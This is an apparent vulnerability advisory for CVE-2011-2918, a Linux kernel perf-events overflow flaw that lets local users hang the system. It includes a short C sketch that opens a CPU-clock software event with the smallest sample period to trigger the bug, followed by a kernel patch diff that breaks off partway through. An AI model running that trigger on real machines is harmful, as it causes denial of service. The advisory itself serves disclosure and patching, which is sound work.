Medium severity (5.5) · NVD Advisory · Published May 24, 2012 · Updated Apr 29, 2026

CVE-2011-2918

Description

The Performance Events subsystem in the Linux kernel before 3.1 does not properly handle event overflows associated with PERF_COUNT_SW_CPU_CLOCK events, which allows local users to cause a denial of service (system hang) via a crafted application.
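
For orientation, this code path is reachable by an unprivileged local user through the perf_event_open(2) syscall. The sketch below is written for this advisory (it is not the reporter's proof of concept): it opens a self-monitoring CPU-clock software event with the smallest possible sample period, which drives the overflow path at high frequency on affected kernels.

    /*
     * Illustrative sketch only: open a PERF_COUNT_SW_CPU_CLOCK sampling
     * event with sample_period = 1 so it overflows as often as possible.
     */
    #include <linux/perf_event.h>
    #include <sys/ioctl.h>
    #include <sys/syscall.h>
    #include <unistd.h>
    #include <string.h>
    #include <stdio.h>

    int main(void)
    {
        struct perf_event_attr attr;

        memset(&attr, 0, sizeof(attr));
        attr.size          = sizeof(attr);
        attr.type          = PERF_TYPE_SOFTWARE;
        attr.config        = PERF_COUNT_SW_CPU_CLOCK;
        attr.sample_period = 1;      /* overflow on every increment */
        attr.disabled      = 1;

        /* perf_event_open(2) has no glibc wrapper; invoke it directly. */
        int fd = syscall(__NR_perf_event_open, &attr,
                         0,   /* pid: calling task */
                         -1,  /* cpu: any CPU      */
                         -1,  /* group_fd: none    */
                         0);  /* flags             */
        if (fd < 0) {
            perror("perf_event_open");
            return 1;
        }

        ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);

        /* Busy-loop so the per-task hrtimer keeps firing overflows. */
        for (volatile unsigned long i = 0; i < (1UL << 28); i++)
            ;

        close(fd);
        return 0;
    }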

Affected products (1)

  • cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*
    Range: <3.1

Patches (1)

a8b0ca17b80e

perf: Remove the nmi parameter from the swevent and overflow interface

https://github.com/torvalds/linux · Peter Zijlstra · Jun 27, 2011 · via nvd-ref
46 files changed · +119 −141
  • arch/alpha/kernel/perf_event.c · +1 −1 · modified
    @@ -847,7 +847,7 @@ static void alpha_perf_event_irq_handler(unsigned long la_ptr,
     	data.period = event->hw.last_period;
     
     	if (alpha_perf_event_set_period(event, hwc, idx)) {
    -		if (perf_event_overflow(event, 1, &data, regs)) {
    +		if (perf_event_overflow(event, &data, regs)) {
     			/* Interrupts coming too quickly; "throttle" the
     			 * counter, i.e., disable it for a little while.
     			 */
    
  • arch/arm/kernel/perf_event_v6.c · +1 −1 · modified
    @@ -479,7 +479,7 @@ armv6pmu_handle_irq(int irq_num,
     		if (!armpmu_event_set_period(event, hwc, idx))
     			continue;
     
    -		if (perf_event_overflow(event, 0, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			armpmu->disable(hwc, idx);
     	}
     
    
  • arch/arm/kernel/perf_event_v7.c · +1 −1 · modified
    @@ -787,7 +787,7 @@ static irqreturn_t armv7pmu_handle_irq(int irq_num, void *dev)
     		if (!armpmu_event_set_period(event, hwc, idx))
     			continue;
     
    -		if (perf_event_overflow(event, 0, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			armpmu->disable(hwc, idx);
     	}
     
    
  • arch/arm/kernel/perf_event_xscale.c · +2 −2 · modified
    @@ -251,7 +251,7 @@ xscale1pmu_handle_irq(int irq_num, void *dev)
     		if (!armpmu_event_set_period(event, hwc, idx))
     			continue;
     
    -		if (perf_event_overflow(event, 0, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			armpmu->disable(hwc, idx);
     	}
     
    @@ -583,7 +583,7 @@ xscale2pmu_handle_irq(int irq_num, void *dev)
     		if (!armpmu_event_set_period(event, hwc, idx))
     			continue;
     
    -		if (perf_event_overflow(event, 0, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			armpmu->disable(hwc, idx);
     	}
     
    
  • arch/arm/kernel/ptrace.c · +1 −1 · modified
    @@ -396,7 +396,7 @@ static long ptrace_hbp_idx_to_num(int idx)
     /*
      * Handle hitting a HW-breakpoint.
      */
    -static void ptrace_hbptriggered(struct perf_event *bp, int unused,
    +static void ptrace_hbptriggered(struct perf_event *bp,
     				     struct perf_sample_data *data,
     				     struct pt_regs *regs)
     {
    
  • arch/arm/kernel/swp_emulate.c · +1 −1 · modified
    @@ -183,7 +183,7 @@ static int swp_handler(struct pt_regs *regs, unsigned int instr)
     	unsigned int address, destreg, data, type;
     	unsigned int res = 0;
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, regs->ARM_pc);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, regs->ARM_pc);
     
     	if (current->pid != previous_pid) {
     		pr_debug("\"%s\" (%ld) uses deprecated SWP{B} instruction\n",
    
  • arch/arm/mm/fault.c · +3 −3 · modified
    @@ -318,11 +318,11 @@ do_page_fault(unsigned long addr, unsigned int fsr, struct pt_regs *regs)
     	fault = __do_page_fault(mm, addr, fsr, tsk);
     	up_read(&mm->mmap_sem);
     
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, addr);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, addr);
     	if (fault & VM_FAULT_MAJOR)
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0, regs, addr);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, regs, addr);
     	else if (fault & VM_FAULT_MINOR)
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0, regs, addr);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, regs, addr);
     
     	/*
     	 * Handle the "normal" case first - VM_FAULT_MAJOR / VM_FAULT_MINOR
    
  • arch/mips/kernel/perf_event.c · +1 −1 · modified
    @@ -527,7 +527,7 @@ handle_associated_event(struct cpu_hw_events *cpuc,
     	if (!mipspmu_event_set_period(event, hwc, idx))
     		return;
     
    -	if (perf_event_overflow(event, 0, data, regs))
    +	if (perf_event_overflow(event, data, regs))
     		mipspmu->disable_event(idx);
     }
     
    
  • arch/mips/kernel/traps.c · +4 −4 · modified
    @@ -578,12 +578,12 @@ static int simulate_llsc(struct pt_regs *regs, unsigned int opcode)
     {
     	if ((opcode & OPCODE) == LL) {
     		perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS,
    -				1, 0, regs, 0);
    +				1, regs, 0);
     		return simulate_ll(regs, opcode);
     	}
     	if ((opcode & OPCODE) == SC) {
     		perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS,
    -				1, 0, regs, 0);
    +				1, regs, 0);
     		return simulate_sc(regs, opcode);
     	}
     
    @@ -602,7 +602,7 @@ static int simulate_rdhwr(struct pt_regs *regs, unsigned int opcode)
     		int rd = (opcode & RD) >> 11;
     		int rt = (opcode & RT) >> 16;
     		perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS,
    -				1, 0, regs, 0);
    +				1, regs, 0);
     		switch (rd) {
     		case 0:		/* CPU number */
     			regs->regs[rt] = smp_processor_id();
    @@ -640,7 +640,7 @@ static int simulate_sync(struct pt_regs *regs, unsigned int opcode)
     {
     	if ((opcode & OPCODE) == SPEC0 && (opcode & FUNC) == SYNC) {
     		perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS,
    -				1, 0, regs, 0);
    +				1, regs, 0);
     		return 0;
     	}
     
    
  • arch/mips/kernel/unaligned.c · +2 −3 · modified
    @@ -111,8 +111,7 @@ static void emulate_load_store_insn(struct pt_regs *regs,
     	unsigned long value;
     	unsigned int res;
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS,
    -		      1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     
     	/*
     	 * This load never faults.
    @@ -517,7 +516,7 @@ asmlinkage void do_ade(struct pt_regs *regs)
     	mm_segment_t seg;
     
     	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS,
    -			1, 0, regs, regs->cp0_badvaddr);
    +			1, regs, regs->cp0_badvaddr);
     	/*
     	 * Did we catch a fault trying to load an instruction?
     	 * Or are we running in MIPS16 mode?
    
  • arch/mips/math-emu/cp1emu.c · +1 −2 · modified
    @@ -272,8 +272,7 @@ static int cop1Emulate(struct pt_regs *xcp, struct mips_fpu_struct *ctx,
     	}
     
           emul:
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS,
    -			1, 0, xcp, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, xcp, 0);
     	MIPS_FPU_EMU_INC_STATS(emulated);
     	switch (MIPSInst_OPCODE(ir)) {
     	case ldc1_op:{
    
  • arch/mips/mm/fault.c · +3 −5 · modified
    @@ -145,7 +145,7 @@ asmlinkage void __kprobes do_page_fault(struct pt_regs *regs, unsigned long writ
     	 * the fault.
     	 */
     	fault = handle_mm_fault(mm, vma, address, write ? FAULT_FLAG_WRITE : 0);
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     	if (unlikely(fault & VM_FAULT_ERROR)) {
     		if (fault & VM_FAULT_OOM)
     			goto out_of_memory;
    @@ -154,12 +154,10 @@ asmlinkage void __kprobes do_page_fault(struct pt_regs *regs, unsigned long writ
     		BUG();
     	}
     	if (fault & VM_FAULT_MAJOR) {
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ,
    -				1, 0, regs, address);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, regs, address);
     		tsk->maj_flt++;
     	} else {
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN,
    -				1, 0, regs, address);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, regs, address);
     		tsk->min_flt++;
     	}
     
    
  • arch/powerpc/include/asm/emulated_ops.h · +2 −2 · modified
    @@ -78,14 +78,14 @@ extern void ppc_warn_emulated_print(const char *type);
     #define PPC_WARN_EMULATED(type, regs)					\
     	do {								\
     		perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS,		\
    -			1, 0, regs, 0);					\
    +			1, regs, 0);					\
     		__PPC_WARN_EMULATED(type);				\
     	} while (0)
     
     #define PPC_WARN_ALIGNMENT(type, regs)					\
     	do {								\
     		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS,		\
    -			1, 0, regs, regs->dar);				\
    +			1, regs, regs->dar);				\
     		__PPC_WARN_EMULATED(type);				\
     	} while (0)
     
    
  • arch/powerpc/kernel/perf_event.c · +3 −3 · modified
    @@ -1207,7 +1207,7 @@ struct pmu power_pmu = {
      * here so there is no possibility of being interrupted.
      */
     static void record_and_restart(struct perf_event *event, unsigned long val,
    -			       struct pt_regs *regs, int nmi)
    +			       struct pt_regs *regs)
     {
     	u64 period = event->hw.sample_period;
     	s64 prev, delta, left;
    @@ -1258,7 +1258,7 @@ static void record_and_restart(struct perf_event *event, unsigned long val,
     		if (event->attr.sample_type & PERF_SAMPLE_ADDR)
     			perf_get_data_addr(regs, &data.addr);
     
    -		if (perf_event_overflow(event, nmi, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			power_pmu_stop(event, 0);
     	}
     }
    @@ -1346,7 +1346,7 @@ static void perf_event_interrupt(struct pt_regs *regs)
     		if ((int)val < 0) {
     			/* event has overflowed */
     			found = 1;
    -			record_and_restart(event, val, regs, nmi);
    +			record_and_restart(event, val, regs);
     		}
     	}
     
    
  • arch/powerpc/kernel/perf_event_fsl_emb.c · +3 −3 · modified
    @@ -568,7 +568,7 @@ static struct pmu fsl_emb_pmu = {
      * here so there is no possibility of being interrupted.
      */
     static void record_and_restart(struct perf_event *event, unsigned long val,
    -			       struct pt_regs *regs, int nmi)
    +			       struct pt_regs *regs)
     {
     	u64 period = event->hw.sample_period;
     	s64 prev, delta, left;
    @@ -616,7 +616,7 @@ static void record_and_restart(struct perf_event *event, unsigned long val,
     		perf_sample_data_init(&data, 0);
     		data.period = event->hw.last_period;
     
    -		if (perf_event_overflow(event, nmi, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			fsl_emb_pmu_stop(event, 0);
     	}
     }
    @@ -644,7 +644,7 @@ static void perf_event_interrupt(struct pt_regs *regs)
     			if (event) {
     				/* event has overflowed */
     				found = 1;
    -				record_and_restart(event, val, regs, nmi);
    +				record_and_restart(event, val, regs);
     			} else {
     				/*
     				 * Disabled counter is negative,
    
  • arch/powerpc/kernel/ptrace.c · +1 −1 · modified
    @@ -882,7 +882,7 @@ void user_disable_single_step(struct task_struct *task)
     }
     
     #ifdef CONFIG_HAVE_HW_BREAKPOINT
    -void ptrace_triggered(struct perf_event *bp, int nmi,
    +void ptrace_triggered(struct perf_event *bp,
     		      struct perf_sample_data *data, struct pt_regs *regs)
     {
     	struct perf_event_attr attr;
    
  • arch/powerpc/mm/fault.c · +3 −3 · modified
    @@ -173,7 +173,7 @@ int __kprobes do_page_fault(struct pt_regs *regs, unsigned long address,
     		die("Weird page fault", regs, SIGSEGV);
     	}
     
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     
     	/* When running in the kernel we expect faults to occur only to
     	 * addresses in user space.  All other faults represent errors in the
    @@ -319,7 +319,7 @@ int __kprobes do_page_fault(struct pt_regs *regs, unsigned long address,
     	}
     	if (ret & VM_FAULT_MAJOR) {
     		current->maj_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0,
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1,
     				     regs, address);
     #ifdef CONFIG_PPC_SMLPAR
     		if (firmware_has_feature(FW_FEATURE_CMO)) {
    @@ -330,7 +330,7 @@ int __kprobes do_page_fault(struct pt_regs *regs, unsigned long address,
     #endif
     	} else {
     		current->min_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0,
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1,
     				     regs, address);
     	}
     	up_read(&mm->mmap_sem);
    
  • arch/s390/mm/fault.c · +3 −3 · modified
    @@ -299,7 +299,7 @@ static inline int do_exception(struct pt_regs *regs, int access,
     		goto out;
     
     	address = trans_exc_code & __FAIL_ADDR_MASK;
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     	flags = FAULT_FLAG_ALLOW_RETRY;
     	if (access == VM_WRITE || (trans_exc_code & store_indication) == 0x400)
     		flags |= FAULT_FLAG_WRITE;
    @@ -345,11 +345,11 @@ static inline int do_exception(struct pt_regs *regs, int access,
     	if (flags & FAULT_FLAG_ALLOW_RETRY) {
     		if (fault & VM_FAULT_MAJOR) {
     			tsk->maj_flt++;
    -			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0,
    +			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1,
     				      regs, address);
     		} else {
     			tsk->min_flt++;
    -			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0,
    +			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1,
     				      regs, address);
     		}
     		if (fault & VM_FAULT_RETRY) {
    
  • arch/sh/kernel/ptrace_32.c · +1 −1 · modified
    @@ -63,7 +63,7 @@ static inline int put_stack_long(struct task_struct *task, int offset,
     	return 0;
     }
     
    -void ptrace_triggered(struct perf_event *bp, int nmi,
    +void ptrace_triggered(struct perf_event *bp,
     		      struct perf_sample_data *data, struct pt_regs *regs)
     {
     	struct perf_event_attr attr;
    
  • arch/sh/kernel/traps_32.c · +1 −1 · modified
    @@ -393,7 +393,7 @@ int handle_unaligned_access(insn_size_t instruction, struct pt_regs *regs,
     	 */
     	if (!expected) {
     		unaligned_fixups_notify(current, instruction, regs);
    -		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0,
    +		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1,
     			      regs, address);
     	}
     
    
  • arch/sh/kernel/traps_64.c · +4 −4 · modified
    @@ -434,7 +434,7 @@ static int misaligned_load(struct pt_regs *regs,
     		return error;
     	}
     
    -	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, address);
     
     	destreg = (opcode >> 4) & 0x3f;
     	if (user_mode(regs)) {
    @@ -512,7 +512,7 @@ static int misaligned_store(struct pt_regs *regs,
     		return error;
     	}
     
    -	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, address);
     
     	srcreg = (opcode >> 4) & 0x3f;
     	if (user_mode(regs)) {
    @@ -588,7 +588,7 @@ static int misaligned_fpu_load(struct pt_regs *regs,
     		return error;
     	}
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, address);
     
     	destreg = (opcode >> 4) & 0x3f;
     	if (user_mode(regs)) {
    @@ -665,7 +665,7 @@ static int misaligned_fpu_store(struct pt_regs *regs,
     		return error;
     	}
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, address);
     
     	srcreg = (opcode >> 4) & 0x3f;
     	if (user_mode(regs)) {
    
  • arch/sh/math-emu/math.c · +1 −1 · modified
    @@ -620,7 +620,7 @@ int do_fpu_inst(unsigned short inst, struct pt_regs *regs)
     	struct task_struct *tsk = current;
     	struct sh_fpu_soft_struct *fpu = &(tsk->thread.xstate->softfpu);
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     
     	if (!(task_thread_info(tsk)->status & TS_USEDFPU)) {
     		/* initialize once. */
    
  • arch/sh/mm/fault_32.c · +3 −3 · modified
    @@ -160,7 +160,7 @@ asmlinkage void __kprobes do_page_fault(struct pt_regs *regs,
     	if ((regs->sr & SR_IMASK) != SR_IMASK)
     		local_irq_enable();
     
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     
     	/*
     	 * If we're in an interrupt, have no user context or are running
    @@ -210,11 +210,11 @@ asmlinkage void __kprobes do_page_fault(struct pt_regs *regs,
     	}
     	if (fault & VM_FAULT_MAJOR) {
     		tsk->maj_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0,
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1,
     				     regs, address);
     	} else {
     		tsk->min_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0,
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1,
     				     regs, address);
     	}
     
    
  • arch/sh/mm/tlbflush_64.c · +3 −3 · modified
    @@ -116,7 +116,7 @@ asmlinkage void do_page_fault(struct pt_regs *regs, unsigned long writeaccess,
     	/* Not an IO address, so reenable interrupts */
     	local_irq_enable();
     
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     
     	/*
     	 * If we're in an interrupt or have no user
    @@ -200,11 +200,11 @@ asmlinkage void do_page_fault(struct pt_regs *regs, unsigned long writeaccess,
     
     	if (fault & VM_FAULT_MAJOR) {
     		tsk->maj_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0,
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1,
     				     regs, address);
     	} else {
     		tsk->min_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0,
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1,
     				     regs, address);
     	}
     
    
  • arch/sparc/kernel/perf_event.c · +1 −1 · modified
    @@ -1277,7 +1277,7 @@ static int __kprobes perf_event_nmi_handler(struct notifier_block *self,
     		if (!sparc_perf_event_set_period(event, hwc, idx))
     			continue;
     
    -		if (perf_event_overflow(event, 1, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			sparc_pmu_stop(event, 0);
     	}
     
    
  • arch/sparc/kernel/unaligned_32.c · +2 −2 · modified
    @@ -247,7 +247,7 @@ asmlinkage void kernel_unaligned_trap(struct pt_regs *regs, unsigned int insn)
     		unsigned long addr = compute_effective_address(regs, insn);
     		int err;
     
    -		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0, regs, addr);
    +		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, addr);
     		switch (dir) {
     		case load:
     			err = do_int_load(fetch_reg_addr(((insn>>25)&0x1f),
    @@ -338,7 +338,7 @@ asmlinkage void user_unaligned_trap(struct pt_regs *regs, unsigned int insn)
     		}
     
     		addr = compute_effective_address(regs, insn);
    -		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0, regs, addr);
    +		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, addr);
     		switch(dir) {
     		case load:
     			err = do_int_load(fetch_reg_addr(((insn>>25)&0x1f),
    
  • arch/sparc/kernel/unaligned_64.c · +6 −6 · modified
    @@ -317,7 +317,7 @@ asmlinkage void kernel_unaligned_trap(struct pt_regs *regs, unsigned int insn)
     
     		addr = compute_effective_address(regs, insn,
     						 ((insn >> 25) & 0x1f));
    -		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0, regs, addr);
    +		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, addr);
     		switch (asi) {
     		case ASI_NL:
     		case ASI_AIUPL:
    @@ -384,7 +384,7 @@ int handle_popc(u32 insn, struct pt_regs *regs)
     	int ret, i, rd = ((insn >> 25) & 0x1f);
     	int from_kernel = (regs->tstate & TSTATE_PRIV) != 0;
     	                        
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     	if (insn & 0x2000) {
     		maybe_flush_windows(0, 0, rd, from_kernel);
     		value = sign_extend_imm13(insn);
    @@ -431,7 +431,7 @@ int handle_ldf_stq(u32 insn, struct pt_regs *regs)
     	int asi = decode_asi(insn, regs);
     	int flag = (freg < 32) ? FPRS_DL : FPRS_DU;
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     
     	save_and_clear_fpu();
     	current_thread_info()->xfsr[0] &= ~0x1c000;
    @@ -554,7 +554,7 @@ void handle_ld_nf(u32 insn, struct pt_regs *regs)
     	int from_kernel = (regs->tstate & TSTATE_PRIV) != 0;
     	unsigned long *reg;
     	                        
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     
     	maybe_flush_windows(0, 0, rd, from_kernel);
     	reg = fetch_reg_addr(rd, regs);
    @@ -586,7 +586,7 @@ void handle_lddfmna(struct pt_regs *regs, unsigned long sfar, unsigned long sfsr
     
     	if (tstate & TSTATE_PRIV)
     		die_if_kernel("lddfmna from kernel", regs);
    -	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0, regs, sfar);
    +	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, sfar);
     	if (test_thread_flag(TIF_32BIT))
     		pc = (u32)pc;
     	if (get_user(insn, (u32 __user *) pc) != -EFAULT) {
    @@ -647,7 +647,7 @@ void handle_stdfmna(struct pt_regs *regs, unsigned long sfar, unsigned long sfsr
     
     	if (tstate & TSTATE_PRIV)
     		die_if_kernel("stdfmna from kernel", regs);
    -	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0, regs, sfar);
    +	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, sfar);
     	if (test_thread_flag(TIF_32BIT))
     		pc = (u32)pc;
     	if (get_user(insn, (u32 __user *) pc) != -EFAULT) {
    
  • arch/sparc/kernel/visemul.c · +1 −1 · modified
    @@ -802,7 +802,7 @@ int vis_emul(struct pt_regs *regs, unsigned int insn)
     
     	BUG_ON(regs->tstate & TSTATE_PRIV);
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     
     	if (test_thread_flag(TIF_32BIT))
     		pc = (u32)pc;
    
  • arch/sparc/math-emu/math_32.c · +1 −1 · modified
    @@ -164,7 +164,7 @@ int do_mathemu(struct pt_regs *regs, struct task_struct *fpt)
     	int retcode = 0;                               /* assume all succeed */
     	unsigned long insn;
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     
     #ifdef DEBUG_MATHEMU
     	printk("In do_mathemu()... pc is %08lx\n", regs->pc);
    
  • arch/sparc/math-emu/math_64.c · +1 −1 · modified
    @@ -184,7 +184,7 @@ int do_mathemu(struct pt_regs *regs, struct fpustate *f)
     
     	if (tstate & TSTATE_PRIV)
     		die_if_kernel("unfinished/unimplemented FPop from kernel", regs);
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     	if (test_thread_flag(TIF_32BIT))
     		pc = (u32)pc;
     	if (get_user(insn, (u32 __user *) pc) != -EFAULT) {
    
  • arch/sparc/mm/fault_32.c · +3 −5 · modified
    @@ -251,7 +251,7 @@ asmlinkage void do_sparc_fault(struct pt_regs *regs, int text_fault, int write,
             if (in_atomic() || !mm)
                     goto no_context;
     
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     
     	down_read(&mm->mmap_sem);
     
    @@ -301,12 +301,10 @@ asmlinkage void do_sparc_fault(struct pt_regs *regs, int text_fault, int write,
     	}
     	if (fault & VM_FAULT_MAJOR) {
     		current->maj_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0,
    -			      regs, address);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, regs, address);
     	} else {
     		current->min_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0,
    -			      regs, address);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, regs, address);
     	}
     	up_read(&mm->mmap_sem);
     	return;
    
  • arch/sparc/mm/fault_64.c · +3 −5 · modified
    @@ -325,7 +325,7 @@ asmlinkage void __kprobes do_sparc64_fault(struct pt_regs *regs)
     	if (in_atomic() || !mm)
     		goto intr_or_no_mm;
     
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     
     	if (!down_read_trylock(&mm->mmap_sem)) {
     		if ((regs->tstate & TSTATE_PRIV) &&
    @@ -433,12 +433,10 @@ asmlinkage void __kprobes do_sparc64_fault(struct pt_regs *regs)
     	}
     	if (fault & VM_FAULT_MAJOR) {
     		current->maj_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0,
    -			      regs, address);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, regs, address);
     	} else {
     		current->min_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0,
    -			      regs, address);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, regs, address);
     	}
     	up_read(&mm->mmap_sem);
     
    
  • arch/x86/kernel/cpu/perf_event.c · +1 −1 · modified
    @@ -1339,7 +1339,7 @@ static int x86_pmu_handle_irq(struct pt_regs *regs)
     		if (!x86_perf_event_set_period(event))
     			continue;
     
    -		if (perf_event_overflow(event, 1, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			x86_pmu_stop(event, 0);
     	}
     
    
  • arch/x86/kernel/cpu/perf_event_intel.c · +1 −1 · modified
    @@ -1003,7 +1003,7 @@ static int intel_pmu_handle_irq(struct pt_regs *regs)
     
     		data.period = event->hw.last_period;
     
    -		if (perf_event_overflow(event, 1, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			x86_pmu_stop(event, 0);
     	}
     
    
  • arch/x86/kernel/cpu/perf_event_intel_ds.c · +2 −2 · modified
    @@ -340,7 +340,7 @@ static int intel_pmu_drain_bts_buffer(void)
     	 */
